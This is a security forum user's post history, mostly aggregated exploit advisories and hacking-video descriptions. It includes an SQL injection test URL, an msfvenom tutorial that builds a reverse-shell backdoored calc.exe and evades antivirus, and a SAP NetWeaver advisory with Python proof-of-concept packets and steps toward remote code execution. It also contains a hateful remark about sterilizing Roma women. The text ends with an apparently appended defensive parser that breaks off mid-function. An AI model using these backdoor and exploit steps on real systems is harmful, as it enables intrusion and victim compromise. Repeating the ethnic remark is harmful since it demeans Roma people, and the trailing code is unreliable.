Everything posted by Praetorian503

  1. Scripts Genie Gallery Personals script suffers from a remote SQL injection vulnerability.

      Gallery Personals Script SQL Injection Vulnerabilities

      Software Page: http://scriptsgenie.com/
      Product Page: http://www.hotscripts.com/listing/gallery-personals/
      Script Demo: http://resalemembership.com/demos/pgallery/
      Author(Pentester): 3spi0n
      On Social: Twitter.Com/eyyamgudeer
      Greetz: Grayhats Inc. and Janissaries Platform.

      [~] MySQL Injection on Demo Site (/gallery.php?L=)
      >>> http://server/demos/pgallery/gallery.php?L=2' (MySQLi Found)

      Source: PacketStorm
  2. Description: OWASP Mantra: OWASP Mantra | Home chillyCMS - chillycms.bplaced.net Exploit-DB: www.exploit-db.com/exploits/24507/ Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Source: Chillycms Multiple Vulnerabilities
  3. Description: Read the article at: Solving OWASP Bricks Challenge #3 using SQLMap and Havij | Hacking Articles Source: Solving Owasp Bricks Challenge #3 Using Havij
  4. Description: Read the article at: Solving OWASP Bricks Challenge #3 using SQLMap and Havij | Hacking Articles Source: Solving Owasp Bricks Challenge #3 Using Sqlmap
  5. Description: David Litchfield is the founder and chief research scientist of NGSSoftware Ltd., a UK-based security solutions provider. He has been recognized as the world's premier expert on Oracle database security, and is the designer of NGSSQuirreL, a powerful tool for identifying and assessing database vulnerability. David is a regular conference speaker and has lectured government agencies on security topics. Source: Blackhat 2010 - Hacking Oracle 11g
  6. Description: From start to finish, we will walk through how a current generation smartcard was successfully compromised. The talk will discuss everything that was required in the order the events took place. We will cram several months into an hour! PS- The talk will be very technical mixed hardware and software (60% hardware, 40% software). Christopher Tarnovsky runs Flylogic Engineering, LLC and specializes in analysis of semiconductors from a security "how strong is it really" standpoint. Flylogic offers detailed reports on substrate attacks which define if a problem exists. If a problem is identified, we explain in a detailed report all aspects of how the attack was done, level of complexity and so on. This is something we believe is unique and allows the customer to then go back to the chip vendor armed with the knowledge to make them make it better (or possibly use a different part). Source: Blackhat 2010 - Deconstructing A Secure Processor
  7. And what's with this? 1. It's spelled Security, not securyti; 2. Downloading a tool off the net doesn't amount to being passionate about 'hack'; 3. This is not a normal introduction (if you dig through the threads you will find one); 4. Edit your post and write your opinions about Polonic and SRI, whether you have a girlfriend and how old she is (possibly her phone number and CNP); 5. I'm sure you'll hang around in off-topic and then ask for $1 to bid on a box of safe condoms; 6. An admin/mod will pass by here and baptize you.
  8. Description: Jorge Luis Alvarez Medina is a Computer Engineer experienced in hardware and software development and security assessment (network and web applications penetration testing) and development (turn-key access control systems, security tools and scripts). Currently working as Security Consultant for CORE Security Technologies. Source: Blackhat 2010 - Internet Explorer Turns Your Personal Computer Into A Public Files Server
  9. Description: Today I am going to show you how to backdoor executables using msfvenom. This is a very handy tool in exploitation. What is MSFVenom? MSFVenom is a combination of MSFPayload and MSFEncode. It is an all-in-one framework that makes it easy for us to create backdoor executables. In this tutorial I will backdoor calc.exe in a Windows XP SP2 system. I will use a reverse connection back to my BackTrack machine. Our template is calc.exe and we will encode using the x86/shikata_ga_nai encoder (I normally use this, you can use whatever you like) and encode this 10 times. So these will be the parameters for msfvenom:

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ your local ip ] LPORT=[ your local port ] -x calc.exe -k -e x86/shikata_ga_nai -i 10 -f exe > calc_backdoor.exe

      I will break it down and explain this for you. -p stands for our payload; here I have used a meterpreter reverse connection, which is awesome to use. LHOST is your local IP and LPORT is your local open port listening. -x is the template we are going to use, or simply our custom executable. -k: we use this option to start our payload in a new thread, otherwise our win32 executable won't load into memory; instead only the payload will be executed. -e is the encoder to use; you can use whatever you like, and you can view all the encoders in the Metasploit framework by typing 'show encoders'. Encoders are important in evading AVs, but this is not as perfect as we think; the best way is to write our own custom encoders for better results. -i stands for iteration or our count, how many times we would encode. -f is the format we are going to use, so in my case I will use exe as the format. So that's it for the creation of our backdoor. Now we will launch Metasploit and use exploit/multi/handler. This is a stub that handles exploits launched outside our framework. As our backdoor listens to the specified settings, we have to give the same payload, same local host and same port which we used at the creation of our backdoor.

      So that's it, run exploit and msf will start listening. Okay, now let's drop our created backdoor, which works fine as a calculator, just like a clone of the calculator. Once the victim runs our infected calc.exe we should get a nice meterpreter reverse connection. So that's it, the box is pwned. We can create the same backdoor by piping msfpayload into msfencode, which results in a very long parameter list and commands that are difficult to memorize:

      msfpayload windows/meterpreter/reverse_tcp LHOST=[ your local ip ] LPORT=[ your local port ] R | msfencode -e x86/shikata_ga_nai -c 10 -o calc_backdoor.exe -t exe -x calc.exe -k

      So by using MSFVenom we can easily generate a payload along with encoding in a simple manner. I hope you learnt something useful. Thank you. Source: Making Backdoors With Msfvenom
  10. Description: This video is all about post-exploitation and maintaining access with an encrypted backdoor after you exploit a system. Maintaining access is a very important part of hacking. Once you have exploited the system, who knows whether next time you can exploit it again; maybe that vulnerability gets patched, or there are other issues. That's why post-exploitation and maintaining access is a very important part of hacking. Source: Maintaining Access
  11. Description: Welcome to Part 8 of the Aircrack-ng Megaprimer series in which I will discuss the tool airgraph-ng. Airgraph-ng is a visual representation tool for data captured via airodump-ng, and can come quite in handy to make sense of a lot of data. As always, if you have any questions or comments, you can either leave them in the comments section below or zip me an e-mail at bennett@securitytube.net Source: Aircrack-Ng Megaprimer Part 8: Airgraph-Ng
  12. Description: This video will give you information about all the Linux processes running in the back end. You don't need to install any 3rd party tool because Linux itself gives the best process management in the terminal. So kindly use it. Thank you for watching. Source: Linux Terminal - Processes
  13. We were paying them for the sterilization of Roma women.
  14. Description: Lutz Donnerhacke holds the lecture. In this presentation, the technical, organizational and political basics of DNS will be presented. The DNS is the resolution of host names to IP addresses and thus represents one of the most important services on the Internet. The Internet Corporation for Assigned Names and Numbers (ICANN) manages the top-level domains (.org, .com, .de, .at) and acts as a kind of global governance of the Internet. Due to the high technical impact of DNS on the Internet, political pressure is exerted on ICANN from various sides to enforce, for example, Websperren or to take whole countries out of the DNS. The lecture was held at the 1st Security Policy development academy of the Federation Security Studies. Link to event: blog.deepsec.net / p = 330 Original Source: ICANN - DNS - Websperren on Vimeo Source: Icann - Dns - Websperren
  15. Core Security Technologies Advisory - Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN (being NN the SAP system number) of a host running the 'Message Server' service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN (being NN the SAP system number) of a host running the 'Message Server' service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 2004s (msg_server.exe version v6400.61.11.10122) . 
SAP Netweaver 7.01 SR1 (msg_server.exe version v7010.29.15.58313) . SAP Netweaver 7.02 SP06 (msg_server.exe version v7200.70.18.23869) . SAP Netweaver 7.30 SP04 (msg_server.exe version v7200.201.0.0) . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. Contact SAP for further information. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= 
'\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver Message Server _MsJ2EE_AddStatistics Vulnerability* [CVE-2013-1592] The vulnerability can be triggered when SAP Netweaver 'msg_server.exe' module processes a specially crafted network packet containing a request with 'iflag' value 0x0c 'MS_J2EE_SEND_TO_CLUSTERID', or 0x0d 'MS_J2EE_SEND_BROADCAST'. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. This vulnerability might allow a remote, unauthenticated attacker to execute arbitrary code with the privileges of the user running the 'Message Server' service or conduct a denial of service attack against the vulnerable systems. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? 
; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 
00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, 
flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? 
; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. 
Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Gain remote code execution by overwriting function pointers. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. 
One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. 
This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4]. 
The following python code can be used to trigger the vulnerability:

/-----
def send_attack(connection):
    print "[*] Sending crash packet"
    crash = '**MESSAGE**\x00' # eyecatcher
    crash+= '\x04' # version
    crash+= '\x00' # errorno
    crash+= server_name # toname
    crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key
    crash+= '\x04\x0d' # flag/iflag
    crash+= client_string # fromname
    crash+= '\x00\x00' # padd
    crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd"
    crash+= "\x00\x00\x00\x01"
    crash+= "\xff\xff\xff\xff"
    crash+= "\x00\x00\x00\x00"
    send_packet(connection, crash)
    print "[*] Crash sent !"
-----/

8.2. *SAP Netweaver Message Server WRITE_C Vulnerability*

[CVE-2013-1593] The vulnerability can be triggered when SAP Netweaver 'msg_server.exe' module processes a specially crafted network packet containing a request with administrative opcode 0x15 'AD_RZL_STRG'. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. This vulnerability could allow a remote, unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability:

/-----
def send_attack(connection):
    print "[*] Sending crash packet"
    crash = '**MESSAGE**\x00' # eyecatcher
    crash+= '\x04' # version
    crash+= '\x00' # errorno
    crash+= server_name # toname
    crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key
    crash+= '\x04\x05' # flag/iflag
    crash+= client_string # fromname
    crash+= '\x00\x00' # padd
    crash+= "AD-EYECATCH\x00"
    crash+= "\x01\x01"
    crash+= "%11d" % 104
    crash+= "%11d" % 1
    crash+= "\x15\x00\x00\x00"
    crash+= "\x20\x00\x00\xc8"
    crash+= "LALA" + ' '*(20-4)
    crash+= "LOLO" + ' '*(40-4)
    crash+= " "*36
    send_packet(connection, crash)
    print "[*] Crash sent !"
-----/

9. *Report Timeline*

. 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013.
. 2012-12-10: Core sends an advisory draft with technical details and a PoC.
. 2012-12-11: The SAP team confirms the reception of the issue.
. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013.
. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013.
. 2012-12-28: SAP notifies Core that they will be contacted if tests fail in order to re-schedule the advisory publication.
. 2013-01-22: First release date missed.
. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned.
. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws.
. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVEs were assigned to them. Those vulnerabilities seem to be related to ZDI advisories [6], [7], [8].
. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers.
. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarding this vulnerability.
. 2013-02-13: Advisory CORE-2012-1128 published.

10. *References*

[1] http://www.sap.com/platform/netweaver/index.epx.
[2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603.
[3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.
[4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.
[5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840.
[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/.
[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/.
[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.

11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

13. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Source: PacketStorm
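For defenders, the header layout and the 'AD_RZL_STRG' opcode described in the advisory above are enough to flag administrative requests reaching the Message Server from unexpected hosts. The parser below is an added example, not code from the advisory or from SAP; the 40-byte width of the name fields, the trusted-host policy and all function names are assumptions, and the input is taken to be the message bytes in the form the advisory's code hands to 'send_packet'.

```python
from dataclasses import dataclass

MS_EYECATCHER = b"**MESSAGE**\x00"
AD_EYECATCHER = b"AD-EYECATCH\x00"
NAME_LEN = 40        # assumption: fixed width of toname/fromname (not stated on the page)
AD_RZL_STRG = 0x15   # administrative opcode named in section 8.2
# Opcode position inside the AD record, following the layout shown in 8.2:
# eyecatcher (12) + 2 bytes + two 11-character decimal fields.
AD_OPCODE_OFFSET = len(AD_EYECATCHER) + 2 + 11 + 11
HEADER_LEN = len(MS_EYECATCHER) + 2 + NAME_LEN + 12 + 2 + NAME_LEN + 2


@dataclass
class MsMessage:
    version: int
    flag: int
    iflag: int
    fromname: str
    payload: bytes


def parse_ms_message(data):
    """Return an MsMessage, or None when data is not a complete MS header."""
    if len(data) < HEADER_LEN or not data.startswith(MS_EYECATCHER):
        return None
    off = len(MS_EYECATCHER)
    version = data[off]
    off += 2 + NAME_LEN + 12      # version, errorno, toname, msgtype/reserved/key
    flag, iflag = data[off], data[off + 1]
    off += 2
    fromname = data[off:off + NAME_LEN].decode("latin-1").rstrip(" \x00")
    return MsMessage(version, flag, iflag, fromname, data[HEADER_LEN:])


def findings(data, src_ip, trusted_hosts):
    """List the reasons a sensor in front of the Message Server port would alert."""
    msg = parse_ms_message(data)
    if msg is None:
        return ["not-ms-message"]
    out = []
    if msg.payload.startswith(AD_EYECATCHER):
        if src_ip not in trusted_hosts:
            out.append("admin-record-from-untrusted-host")
        if len(msg.payload) <= AD_OPCODE_OFFSET:
            out.append("truncated-admin-record")
        elif msg.payload[AD_OPCODE_OFFSET] == AD_RZL_STRG:
            out.append("AD_RZL_STRG-request")
    return out


def constructed_message(payload, fromname=b"sensor-test"):
    """Constructed sample: the page's header layout around an arbitrary payload."""
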